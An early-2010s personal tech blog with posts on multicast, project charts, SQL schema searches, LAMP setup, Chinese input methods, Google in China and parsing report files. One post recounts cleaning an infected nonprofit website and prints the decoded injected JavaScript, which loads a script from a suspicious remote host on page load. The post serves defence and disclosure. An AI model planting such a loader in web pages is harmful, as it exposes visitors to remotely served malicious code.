Multicast

On Friday night, I attended a seminar in which Director of Market Data from InterContinental Exchange (ICE), David Chen gave an introduction on how the Stock and Future Contract Exchange works. It’s the first time I was exposed to such technology and it is pretty interesting.

During his talk, he mentioned that Multicast is used to distribute data from the Exchange to multiple client applications.

Multicast addressing is a network technology for the delivery of information to a group of destinations simultaneously using the most efficient strategy to deliver the messages over each link of the network only once, creating copies only when the links to the multiple destinations split.

The word “multicast” is typically used to refer to  IP multicast, which is often employed for media streaming applications. In IP multicast the implementation of the multicast concept occurs at the IP routing level, where routers create optimal distribution paths for datagrams sent to a multicast destination address spanning tree in real-time.

The most common protocol used in an IP network is TCP – Transmission Control Protocol, which is one of the main protocols in TCP/IP networks. Whereas the IP protocol deals only with packets, TCP enables two hosts to establish a connection and exchange streams of data. TCP guarantees delivery of data and also guarantees that packets will be delivered in the same order in which they were sent.

Since TCP requires a dedicated connection between two IPs, which creates a lot of overhead in network traffic, it is not good for Multicast. Mr. Chen did not say what protocol is used, but I believe it must be UDP.

UDP stands for User Datagram Protocol. It provides a connectionless host-to-host communication path. UDP has minimal overhead; each packet on the network is composed of a small header and user data. It is called a UDP datagram.

UDP preserves datagram boundaries between the sender and the receiver. It means that the receiver socket will receive an OnDataAvailable event for each datagram sent and the Receive method will return a complete datagram for each call. If the buffer is too small, the datagram will be truncated. If the buffer is too large, only one datagram is returned, the remaining buffer space is not touched.

UDP is connectionless. It means that a datagram can be sent at any moment without prior advertising, negotiation or preparation. Just send the datagram and hope the receiver is able to handle it.

The biggest disadvantage of UDP is that it is an unreliable protocol. There is absolutely no guarantee that the datagram will be delivered to the destination host. Although the failure rate is very low on the Internet and nearly null on a LAN unless the bandwidth is full, packet loss prevention if crucial in transmitting data from Exchange to client applications. Unfortunately, Mr. Chen did not disclose what method is used in their Exchange, which must be a core technology all Exchange companies spend money to improve and protect.

Gantt and PERT Charts

Gantt and PERT charts are visualization tools commonly used by project managers to control and administer the tasks required to complete a project.

The Gantt chart, developed by Charles Gantt in 1917, focuses on the sequence of tasks necessary for completion of the project at hand. Each task on a Gantt chart is represented as a single horizontal bar on an X-Y chart. The horizontal axis (X-axis) is the time scale over which the project will endure. Therefore, the length of each task bar corresponds to the duration of the task, or the time necessary for completion. Arrows connecting independent tasks reflect the relationships between the tasks it connects. The relationship usually shows dependency where one task cannot begin until another is completed. The resources necessary for completion are also identified next to the chart. The Gantt chart is an excellent tool for quickly assessing the status of a project. The following Gantt chart was developed using MS Project for developing a proposal.

gantt.jpg (170856 bytes)

Making this chart is a pretty self explanatory task. Almost all controls are available by double clicking task names in the column on the left. This chart shows the resources, completion (shown by the horizontal black line within the task bar), and prerequisite relationships….all controllable through double clicking appropriate task name on the left. You can change the time scale on the top by right click….time scale option. Its basically controlled by typical Microsoft actions used in any MS application.


PERT (Program Evaluation and Review Technique) charts were first developed in the 1950s by the Navy to help manage very large, complex projects with a high degree of intertask dependency. Classical PERT charting is used to support projects that are often completed using an assemply line approach. MS Project can create a PERT chart from a Gantt chart. The PERT below is another representation of the Proposal project shown above.

pert.jpg (151487 bytes)

Again, the representation above is relatively self explanatory. The completed tasks have been crossed out while partially completed tasks have one slash through them. The tasks also show duration, beginning date and ending date.

The critical path (shown in red) is a series of tasks that must be completed on schedule for a project to finish on schedule. Each task on the critical path is a critical task. Most tasks in a typical project have some slack and can therefore be delayed a little without affecting the project finish date. Those tasks that cannot be delayed without affecting the project finish date are the critical tasks. As you modify tasks to resolve overallocations or other problems in your schedule, be aware of the critical tasks and that changes to them will affect your project finish date.

Microsoft Dynamics

Recently I was seeking the opportunities to become a Microsoft partner of their Dynamics product line for one of my company, and I would like to find it out by the usual process of any IT professionals who might do. I go to Microsoft Dynamics website and had a nice little chat with a customer service representative.

Here’s a summary if you are interested.

Microsoft ‘Dynamics’ is a line of software for ERP (Enterprise Resource Planning), Accounting, CRM (Customer Relationship Management), project management and POS (point of sales) solutions for business.

The product names and purposes are as following

Dynamics NAV is a bit more geared towards manufacturing
Dynamics SL is more for project and time and expense companies
Dynamics GP for accounting, manufacturing and distribution
Dynamics AX for specific and intricate demands of a worldwide company.
Dynamics Point of Sales is for point of sales.
Dynamics CRM would handle features such as Contacts, Sales Tracking, Lead Management, Marketing, Customer Service, etc.

Since Microsoft loves to bundle software together, I asked the question if there is a “business studio” that offers the features of all above software and the answer is negative. I still believe eventually there will and it is work in progress right now.

The representative also suggested me to check out this link http://www.microsoftdynamicspartnercommunity.com/ for more help if I want to resell a customized solution from these products

Why iPad

I can understand the success of iPhone. First, it’s a phone. It can be used somewhat like a computer, and it’s cute. It’s an expensive assessory which can be showed off by men as a Rolex watch or women as a Hermes handbag.

iPad is released over the weekend. Some say it’s a bigger version of iPhone, but it’s not a phone. It’s a computer, which is also cute, but a cute computer. When we buy computers, we should think more about features, functionalities and expandabilities. I don’t think iPhone’s success which is based on cuteness, dumb proof functions, and pre-selected features can be duplicated in iPad.

I like the following comparison between iPad and other similar products which are or will be out there in the market.

(Dumb template! Click the image to see it in full size.)

Database Schema Search

Do you ever have to check all stored procedures in a database to see if they are interacting with a certain table. Do you have to search all tables, views, stored procedures to see if a certain column of a table is used. All database objects are stored in the system tables just as the tables user created, so we should be able to use a simple query to find it out. But, do you remember all the system tables and column names?

I just finished a project that requires us to change the length of an account number field, due to business change, we have to search all database objects to find references to this field and the following queries came in handy.

Search for Text in Stored Procedures

DECLARE @SEARCH_TERM VARCHAR(100)
SET @SEARCH_TERM = ‘%BANKCARD_999%’

SELECT   
     ROUTINE_NAME,
     ROUTINE_DEFINITION
FROM   
    INFORMATION_SCHEMA.ROUTINES
WHERE   
    ROUTINE_DEFINITION LIKE @SEARCH_TERM
ORDER BY
    ROUTINE_NAME


Search for Text in All Columns

DECLARE @SEARCH_TERM VARCHAR(100)
SET @SEARCH_TERM = ‘%BANKCARD_999%’

SELECT  
     TABLE_NAME,
     COLUMN_NAME
FROM  
    INFORMATION_SCHEMA.COLUMNS
WHERE  
    COLUMN_NAME LIKE @SEARCH_TERM
ORDER BY
    TABLE_NAME,
    COLUMN_NAME


Search for Text in All Database Objects

DECLARE @SEARCH_TERM VARCHAR(100)
SET @SEARCH_TERM = ‘%BANKCARD_999%’

SELECT
 o.NAME,
 c.TEXT
FROM
 sysobjects o
INNER JOIN
 syscomments c
ON
 o.id = c.id
WHERE 
 c.TEXT LIKE @SEARCH_TERM
o.TYPE IN (
‘P’, — Stored Procedure
‘V’, — View
‘FN’, — Function,
‘PK’ — Key
)

The queries will help you solve your problems, but there are a lot more than this. Most of the time, when you have to search for something in the whole database, they are not always called the same, so you will need to try these queries for several search terms, and filter out the right ones manually. This is very important and I’m going to tell you a lesson we learned with our project. We actually searched for all the terms that we know are used for the changing account number, and thought we have covered all the basis. However, we didn’t realize that there is another commonly used field called reference number, and it’s created as a combination of the changing account number and a special code, so the reference number needs to be searched and modified as well. That caused a 60-hour working week for everybody on my team.

For whatever reason you came here to read this blog, I hope you can learn from what I didn’t do and save 20 hours for your family or your hobbies.

Create an Apache Web Server Running PHP and MySQL on Linux

For quite a while I was wondering that with .NET and Java so developed and more and more developer friendly, why is PHP still so popular?

I recently took the responsibility of maintaining a website written in PHP, and I need to install a web server that supports PHP and MySQL. First I just wanted to install those on one of my Windows machine on top of IIS. Since I don’t want to mix this with my other works, I decided to put this on a virtual machine. It turned out to be a great decision, and I accomplished my task in just about an hour, and finally find the answer to my question.

First I decided to install Linux on my VMWare, and in searching for the latest and greatest version of Linux, I found Ubuntu.

What is Ubuntu

Ubuntu is an open source operating system based on Debian GNU/Linux distribution. It gets its name from a Southern African ethical ideology “Ubuntu” which means humanity towards others. It comes with multiple open source software packages, and it’s easy to install and ready to use.

You can download the latest version from their website: http://www.ubuntu.com. As of March 2010, the latest version is 9.10. A new version is released every 6 months, and are supported for 18 months.

The installation takes about 30 minutes, and the only time user will be prompt to key in anything is at the very beginning for an admin user name and password. It’s so easy that I don’t even know how to write a step by step instruction.

Ubuntu comes with many software package, and one of them is LAMP

What is LAMP

LAMP is an acronym for a solution stack of free, open source software, originally coined from the first letters of Linux (operating system), Apache HTTP Server, MySQL (database software), and PHP, (sometimes Python or Perl), which are principal components to build a web server for general purposes.

Step by Step Installation Guide of  LAMP on Ubuntu

Here’s a good link on how to install LAMP on Ubuntu http://www.howtoforge.com/ubuntu_lamp_for_newbies.

So, why PHP is so popular? It’s free and it comes as a package with Linux. Open Source rules!

Website Virus Detection

Today, I officially become the webmaster of a non-profit organization. Their website was shut down by the hosting company, because they found malware or virus on the website.

This is actually the first time I encountered such an issue. We called the hosting company, and asked them if they knew where the virus was from, and how we got infected? The technical support person told us that the virus was detected by their system, but they don’t know where exactly it was. He mentioned a few common issues they knew, such as a change of the .htaccess file, an iframe added to one of our pages, or a SQL injection into our database, and suggested us to download the code and scan it through an Anti-Virus software.

The first thing I did is checking the .htaccess, and I only find code to redirect the site to the generic access denied page from the hosting site. I guessed if there were any malicious code in that file, it has been cleaned, which is good over all, but not good for tracing the virus.

Next, I downloaded the site, and ran it through Norton Anti-Virus first, but I found nothing. I ran it through another software called MalwareBytes’ Anti-Malware, hoping to find a malware, for which the name of the software suggested that it’s good. I found nothing either.

I searched google using key word “Website, Virus”, and find a link about website being attacked by having java scripts inserted into each page, that calls a php page from another website. I tried to find out if it’s the same senario for our website by searching “http://” on all of our pages, and I found all references valid.

It’s been two hours and I’m still in a middle of nowhere, and I found the following piece of code at the end of our index.php file. I copied the code to a note pad and here’s a screenshot of it.

It’s really hard to figure out what it does, but when code is written in such a bad format, it can’t be anything good. I copied the code into a script editor, and tried to decode it. I slowed figured out that there is a function O(Cp, I) defined in this spagetti code, that is used to encode strings. I wrote a separate java script to get all the variables assigned by function O, and O yeah, I decoded the following words:

appendChild
/autohome.com.cn/autohome.com.cn/39.net/google.com/btjunkie.org.php
8080
body
createElement
http: //sun-com.ifolder.ru.fanpop-com.cybertagonline.ru:
setAttribute
onload

In the end, it’s not hard to figure out what it was doing.

/*
window["onload"] = function()
{
    var element = document.createElement("script");
    element.src = "http://sun-com.ifolder.ru.fanpop-com.cybertagonline.ru:8080/autohome.com.cn/autohome.com.cn/39.net/google.com/btjunkie.org.php";
    element.setAttribute("defer", "1");
    document.body.appendChild(element);

};
*/

It’s loading a php page from a Russian webiste whenever the home page of this organization is visited. I detected three files that have the code inserted. I still need to do a compare of the site with an old version before I request the site to be restored.

I still need to find out how the code was able to be inserted into our pages, and mend the security flaws if there are any, but so far, I think I really deserve some beers.

————– 3/29/2010 Update —————–

The code was inserted into every index.php file and every .js file on the site. First I tried to delete them manually, but the script still popped up when I visited a certain page. I read through the code, and found a sub folder used by a third party component that has about 10 subfolders in it, and within each there are 3 to 10 javascripts. There’s no way I could clean them all by hand, so I downloaded all code to my local machine, and decided to do a bulk replacement by Microsoft Visual Studio. (Yeah, mostly I’m a .NET guy, and I know this is an overkill.) Here are the procedures:

  1. File -> Open -> Website, and on the popped up File System screen, select the root folder of the affected website.
  2. Visual Studio will ask you whether you want to convert the website to a newer .NET version. Select No, cause we don’t want to compile it in.NET at all.
  3. Edit -> Find and Replace ->Replace in Files, put in the malicious script in Find What text box, leave Replace With text box empty, and select Entire Solution.
  4. Click Replace All button, Visual Studio will do all the dirty job for you.
  5. After it’s done, save all files. You probably want to test everything on your local machine, and upload the site after everything worked fine.

I only use gPHPEdit and BlueFish in Linux for PHP editing, and neither can do what I did with Visual Studio, so I can’t comment on what tools you can use to do bulk replacement, but I’m sure the ones that you can use to create a project should have the Replace All in Project feature.

Fight the Virus, and happy coding!

内牛满面 – Moved to Tears by Google Pinyin

This is my first Chinese blog on this site. It’s talking about a Software called Google Pinyin, which is used to write Chinese characters using Pinyin, or Chinese alphabetic. Pinyin uses Latin alphabet to transcribe Chinese characters to show the pronunciation. Since there are so many dialects in China, when Pinyin system was created half a century ago, it was decided to use the pronunciation of Mandarin, which is a northern Chinese dialect, as the standard.

There are huge differences between the northern Chinese dialects and southern Chinese dialects, and it’s a nightmare for southerners to learn Pinyin, because it does not always sound like how they used to pronounce a character. For some southern dialects, the following pairs of consonants and syllables sound the same:  l and n, h and f, and in and ing, etc.

When different methods of inputting Chinese characters into computers are developed, Pinyin input became  the most popular one because it’s the easiest to learn, however, it’s not so easy for non-Mandarin speaking Chinese, because if you can’t say it right, you don’t get the right word.

It has been a problem for a decade until I found a new feature on Google Pinyin. It’s called Fuzzy Pinyin. By setting Fuzzy Pinyin on, you can set the input system to treat l and n, or h and f, or in and ing the same, so you can get the right word with your favorite pronunciation. For example, I came from Hunan Province, and Hunanese pronounce the name of their home province “fulan”. In Google Pinyin, if you set Fuzzy Pinyin on, and type in”fulan”, the pronunciation that used to bring laughter from Northerners will give you the correct name of your proud home – 湖南.

昨天在新机器上装Google Pinyin,突然发现有一个以前没有见过的设置 – 模糊拼音。打开一看,激动得我只能用一句流行网络语表达心情,那就是 “内牛满面”。

我们南方人,鼻音(n)无鼻音(l)不分,前鼻音(in)后鼻音(ing)不分,卷舌(s)不卷舌(sh)不分,江浙那边的人r和l不分,我们湖南及周边省的人h和f不分,当年学汉语拼音的时候吃尽了苦头,在北方上学的时候受尽了嘲笑。

我的汉语拼音不算差,虽然说的时候前鼻音后鼻音,卷舌不卷舌时常不对,可是写拼音的时候还是基本上不会错。不过对一些口音重的同学和老人家,用拼音打字是一件很头痛的事情。模糊拼音,就是让用户可以自己设置,如l=n,h=f,in=ing,这样,当你使用l,h,或f的时候 ,程序会认为你可能也是想用n,f,或ing,从而能把正确的词组选出来。

下面是我和我的南方同学们在北京上大学四年犯的一些经典错误,都是一说完北方同学就暴笑不已,说的人一头雾水。

读音 – 不用模糊拼音 – 使用模糊拼音后

he lai – 喝来 – 喝奶
yuan run de tun bu – 元论的臀部 – 圆润的臀部
fu lan ren – 弗兰人 – 湖南人
ying luan – 赢乱 – 淫乱

我很感谢这个提出“模糊拼音”概念并将该功能实现的人(不知是不是Google),真正把方便用户放在第一位。也证明了,世界上没有绝对的对和错,只有合理和不合理。

Google.cn

On Monday 3/22/2010, Google, the giant Internet Search company closed it’s operation in Mainland China, and redirect the visitors of Google.cn to it’s Hong Kong website. The reason, is that it does not want to comply with the Chinese Internet Laws to apply filters to it’s search results, therefore, was forced to be shut down.

The fuss between Google and Chinese Government actually started in Janurary this year, when Google claimed that some political dividents’ gmail accounts were attacked by organized hackers, possibly supported by the Chinese government, and it threatened to stop doing business in China. Withouth showing any proof, the allegation appeared to be ridiculous. Later, Google announced that they would no longer comply with the Chinese censorship laws and will remove all filters from the search results, which gained the support from US Secretary of State Hillary Clinton and US President Barack Obama. Politicalization of the issues showed two images of Google to the world: one as a righteous entity that supports anti-censorship at the cost of losing the biggest market; one as an avarice business man who’s not afraid to use politics to help gain bigger interests. Google’s decision to stay and negotiate with Chinese government for two more months is an piece of evidence that profit making is more important to this company than being justice, and its final exit of China made Google a loser after playing fire.

Google may not look like a pioneer who shed blood in a righteous war against censorship, and you may laugh at it’s ridiculous strategy dealing with Chinese government, but what about the censorship itself? To be not able to read, write and speak whatever we want is the biggest ridicule of all. I was raised by a system that only showed me what is defined to be correct by the system. It makes me feel idiotic when I finally was able to judge right from wrong, and powerless talking to people who are able to accept and talk like the system. Knowing that system is still functioning, and working on generations of young people to come, how can I laugh at Google.

Parsing Unstructured File

The biggest challenge with ETL (Extract, Transform and Load of data) process is that sometimes the data source is in a file that cannot be easily parsed into a data table. Those files are designed for human to read, but they ended up being the only way we can get the data we need. We call these files unstructured files. They actually have structure. Any files created by computer have structures, but these files just don’t have the data processing folks’ favorite structures – fix width, tab or comma deliminated. Today, I would like to talk about how to parse these unstructured files into fix width, or tab deliminated files.

Let’s use the following report as an example. Click here to see the full width file from UnstructuredFile.Com .

H03/09/10                                             CREDIT CARD REJECT REPORT                                         PAGE      1
                                    ABBA1000          5000 PEACHTREE STREET, ATLANTA GA
                      SERIAL TRANSAHAION  LOC                             REQUESTED        COMPLETED
  CREDIT CARD         NUMBER DATE   TIME  CODE ACCOUNT          NR            TOTAL            TOTAL R SEC  DS  TRAN DESC
0 0000704017864322    3833   100309130135 HN   010100003440     25           200.00              .00 5 000  13  INSUFFICIENT FUND
0 1000302007395600    5621   100309123949 HE   000500000500     36            40.00            40.00 5 000  11  INSUFFICIENT FUND
0 0000764006000809    4716   100308211400 HA   000360000526     09            60.00            60.00 5 000  11  ACCOUNT NOT FOUND
0 1000282001389165    5520   100309104536 HA   000800009579     09            20.00            20.00 5 000  11  ACCOUNT NOT FOUND
0 2000801811178532    9054   100309110145 HA   000000346461     09           300.00              .00 5 000  13  INSUFFICIENT FUND
0 0000760102949444    5425   100309160151 HA   000000290219     09           200.00           200.00 5 000  11  ACCOUNT NOT FOUND
0 0000764007759155    9683   100308210045 HA   300000353459     09            30.00              .00 5 000  11  INSUFFICIENT FUND
0 0000764004552579    3786   100309080825 HA   000005471825     09            20.00            20.00 5 000  11  INSUFFICIENT FUND
0 0000704014962525    3708   100309112904 HA   000000178713     25           380.00              .00 5 000  11  INSUFFICIENT FUND
0 0000764007729026    2583   100309153515 HA   003000011079     09              .00              .00 2 070      INSUFFICIENT FUND
0 0000764007524799    8686   100309152452 HA   000010670789     09            20.00              .00 5 000  11  INSUFFICIENT FUND
0 3000760035366790    2263   100309132256 HA   000000184919     12            50.00              .00 5 000  13  INSUFFICIENT FUND
0 1000282000968712    2395   100309195136 HA   300006250618     09           500.00              .00 5 000  13  INSUFFICIENT FUND
0 1000282003811927    9445   100309070605 HA   000002912833     09           100.00           100.00 5 000  11  ACCOUNT NOT FOUND
0 0000760009335499    6496   100309181313 HA   000099724489     09           100.00           100.00 5 000  11  ACCOUNT NOT FOUND
0 1000282004196039    4515   100309091645 HA   380000027935     09           200.00              .00 5 000  11  INSUFFICIENT FUND
0 3333900023993421    8040   100309115609 HA   000000000000     00            20.00              .00 7 000  11  INSUFFICIENT FUND
0 2000801800001810    1567   100309183922 HA   009361603254     09            40.00            40.00 5 000  11  ACCOUNT NOT FOUND
0 0000764005927390    2055   100308211040 HA   300005846269     09           200.00           200.00 5 000  13  ACCOUNT NOT FOUND
0 0000764005927390    2056   100308211214 HA   300005846269     09            60.00            60.00 5 000  13  ACCOUNT NOT FOUND
0 0000764007031332    2285   100309145212 HA   300000002865     09           200.00           200.00 5 000  11  ACCOUNT NOT FOUND         

T                                                                            460.00           460.00                                 

H03/09/10                                             CREDIT CARD REJECT REPORT                                         PAGE      2
                                    ABBA1001          5001 PEACHTREE STREET, ATLANTA GA
                      SERIAL TRANSAHAION  LOC                             REQUESTED        COMPLETED
  CREDIT CARD         NUMBER DATE   TIME  CODE ACCOUNT          NR            TOTAL            TOTAL R SEC  DS  TRAN DESC
0 0000704017864322    3833   100309130135 HN   010100003440     25           200.00              .00 5 000  13  INSUFFICIENT FUND
0 1000302007395600    5621   100309123949 HE   000500000500     36            40.00            40.00 5 000  11  INSUFFICIENT FUND
0 0000764006000809    4716   100308211400 HA   000360000526     09            60.00            60.00 5 000  11  ACCOUNT NOT FOUND
0 1000282001389165    5520   100309104536 HA   000800009579     09            20.00            20.00 5 000  11  ACCOUNT NOT FOUND
0 2000801811178532    9054   100309110145 HA   000000346461     09           300.00              .00 5 000  13  INSUFFICIENT FUND
0 0000760102949444    5425   100309160151 HA   000000290219     09           200.00           200.00 5 000  11  ACCOUNT NOT FOUND
0 0000764007759155    9683   100308210045 HA   300000353459     09            30.00              .00 5 000  11  INSUFFICIENT FUND
0 0000764004552579    3786   100309080825 HA   000005471825     09            20.00            20.00 5 000  11  INSUFFICIENT FUND
0 0000704014962525    3708   100309112904 HA   000000178713     25           380.00              .00 5 000  11  INSUFFICIENT FUND
0 0000764007729026    2583   100309153515 HA   003000011079     09              .00              .00 2 070      INSUFFICIENT FUND
0 0000764007524799    8686   100309152452 HA   000010670789     09            20.00              .00 5 000  11  INSUFFICIENT FUND
0 3000760035366790    2263   100309132256 HA   000000184919     12            50.00              .00 5 000  13  INSUFFICIENT FUND
0 1000282000968712    2395   100309195136 HA   300006250618     09           500.00              .00 5 000  13  INSUFFICIENT FUND
0 1000282003811927    9445   100309070605 HA   000002912833     09           100.00           100.00 5 000  11  ACCOUNT NOT FOUND
0 0000760009335499    6496   100309181313 HA   000099724489     09           100.00           100.00 5 000  11  ACCOUNT NOT FOUND
0 1000282004196039    4515   100309091645 HA   380000027935     09           200.00              .00 5 000  11  INSUFFICIENT FUND
0 3333900023993421    8040   100309115609 HA   000000000000     00            20.00              .00 7 000  11  INSUFFICIENT FUND
0 2000801800001810    1567   100309183922 HA   009361603254     09            40.00            40.00 5 000  11  ACCOUNT NOT FOUND
0 0000764005927390    2055   100308211040 HA   300005846269     09           200.00           200.00 5 000  13  ACCOUNT NOT FOUND
0 0000764005927390    2056   100308211214 HA   300005846269     09            60.00            60.00 5 000  13  ACCOUNT NOT FOUND
0 0000764007031332    2285   100309145212 HA   300000002865     09           200.00           200.00 5 000  11  ACCOUNT NOT FOUND         

T                                                                            460.00           460.00                                 

H03/09/10                                             CREDIT CARD REJECT REPORT                                         PAGE      3
                                    ABBA1002          5002 PEACHTREE STREET, ATLANTA GA
                      SERIAL TRANSAHAION  LOC                             REQUESTED        COMPLETED
  CREDIT CARD         NUMBER DATE   TIME  CODE ACCOUNT          NR            TOTAL            TOTAL R SEC  DS  TRAN DESC
0 0000704017864322    3833   100309130135 HN   010100003440     25           200.00              .00 5 000  13  INSUFFICIENT FUND
0 1000302007395600    5621   100309123949 HE   000500000500     36            40.00            40.00 5 000  11  INSUFFICIENT FUND
0 0000764006000809    4716   100308211400 HA   000360000526     09            60.00            60.00 5 000  11  ACCOUNT NOT FOUND
0 1000282001389165    5520   100309104536 HA   000800009579     09            20.00            20.00 5 000  11  ACCOUNT NOT FOUND
0 2000801811178532    9054   100309110145 HA   000000346461     09           300.00              .00 5 000  13  INSUFFICIENT FUND
0 0000760102949444    5425   100309160151 HA   000000290219     09           200.00           200.00 5 000  11  ACCOUNT NOT FOUND
0 0000764007759155    9683   100308210045 HA   300000353459     09            30.00              .00 5 000  11  INSUFFICIENT FUND
0 0000764004552579    3786   100309080825 HA   000005471825     09            20.00            20.00 5 000  11  INSUFFICIENT FUND
0 0000704014962525    3708   100309112904 HA   000000178713     25           380.00              .00 5 000  11  INSUFFICIENT FUND
0 0000764007729026    2583   100309153515 HA   003000011079     09              .00              .00 2 070      INSUFFICIENT FUND
0 0000764007524799    8686   100309152452 HA   000010670789     09            20.00              .00 5 000  11  INSUFFICIENT FUND
0 3000760035366790    2263   100309132256 HA   000000184919     12            50.00              .00 5 000  13  INSUFFICIENT FUND
0 1000282000968712    2395   100309195136 HA   300006250618     09           500.00              .00 5 000  13  INSUFFICIENT FUND
0 1000282003811927    9445   100309070605 HA   000002912833     09           100.00           100.00 5 000  11  ACCOUNT NOT FOUND
0 0000760009335499    6496   100309181313 HA   000099724489     09           100.00           100.00 5 000  11  ACCOUNT NOT FOUND
0 1000282004196039    4515   100309091645 HA   380000027935     09           200.00              .00 5 000  11  INSUFFICIENT FUND
0 3333900023993421    8040   100309115609 HA   000000000000     00            20.00              .00 7 000  11  INSUFFICIENT FUND
0 2000801800001810    1567   100309183922 HA   009361603254     09            40.00            40.00 5 000  11  ACCOUNT NOT FOUND
0 0000764005927390    2055   100308211040 HA   300005846269     09           200.00           200.00 5 000  13  ACCOUNT NOT FOUND
0 0000764005927390    2056   100308211214 HA   300005846269     09            60.00            60.00 5 000  13  ACCOUNT NOT FOUND
0 0000764007031332    2285   100309145212 HA   300000002865     09           200.00           200.00 5 000  11  ACCOUNT NOT FOUND         

T                                                                            460.00           460.00

Most of the content of this file are fix width transactions, which is easy to be parsed. however, there are information in the report heading section, such as the date and the page number that need to be parsed as well.  Also, the file includes pages, which adds an extra layer of grouping.

In order to parse it, first we need to seperate the files into sections, each section starts with the first character of the header, the H, and ends with the last line before the next header that starts with H.  In this example, we have three sections.

Within each section, there is a header, which is the first 4 lines. The 3rd and 4th line are actually the column names for the transactions, but when we do parsing, we can ignore them, and make them part of the header.

Transactions starts with 0 as the first character, and it’s already fix width.

Footer starts with the next line after last transaction. Sometimes we have to parse fields from the footer section, and here we will ignore everything from the footer.

In order to simply the data structure, we will normalize the data and append the fields in the header and footer to the fields from transactions.

Next, we need to define a template on how to parse the file. A template will look like this.

Header Section
  Literal “H”
  8 Characters (REPORT_DATE column)
  Any characters
  Literal “PAGE”
  Any Spaces
  Any numbers (PAGE column)
  Any Spaces
  Line Break

  …

Item Section
  Literal “0″
  1 Space
  16 Numbers (CARD_NUM column)
  4 Spaces
  4 Numbers (SERIAL_NUM column)

  …

  Line Break

Footer Section
  Any Characters
  Line Break 
  Any Characters
  Line Break

With the template file, we can write the code to parse the file. Here’s a pseudo code on how to parse the file.

FOR EACH MATCHING SECTIONS

    FIND MATCHING HEADER
    PARSE THE FIELDS FROM HEADER

    FIND MACHING ITEMS
        FOR EACH MATHCING ITEMS

            PARSE THE FIELDS FROM ITEM

        END LOOP

    FIND MATCHING FOOTER
    PARSE THE FIELDS FROM FOOTER

END LOOP

Here’s a screen shot of an application that used to design template and parse data. The upper box on the left side has the unstructured file. Header has been colored golden, and transctions green. All field that needs to be imported are colored navy. The lower box on the left side has the parsed data. The box on the right side is the template.

Click here to see the full width image from UnstructuredFile.com

Software will be available from http://www.unstructuredfile.com in May 2010.

Follow

Get every new post delivered to your Inbox.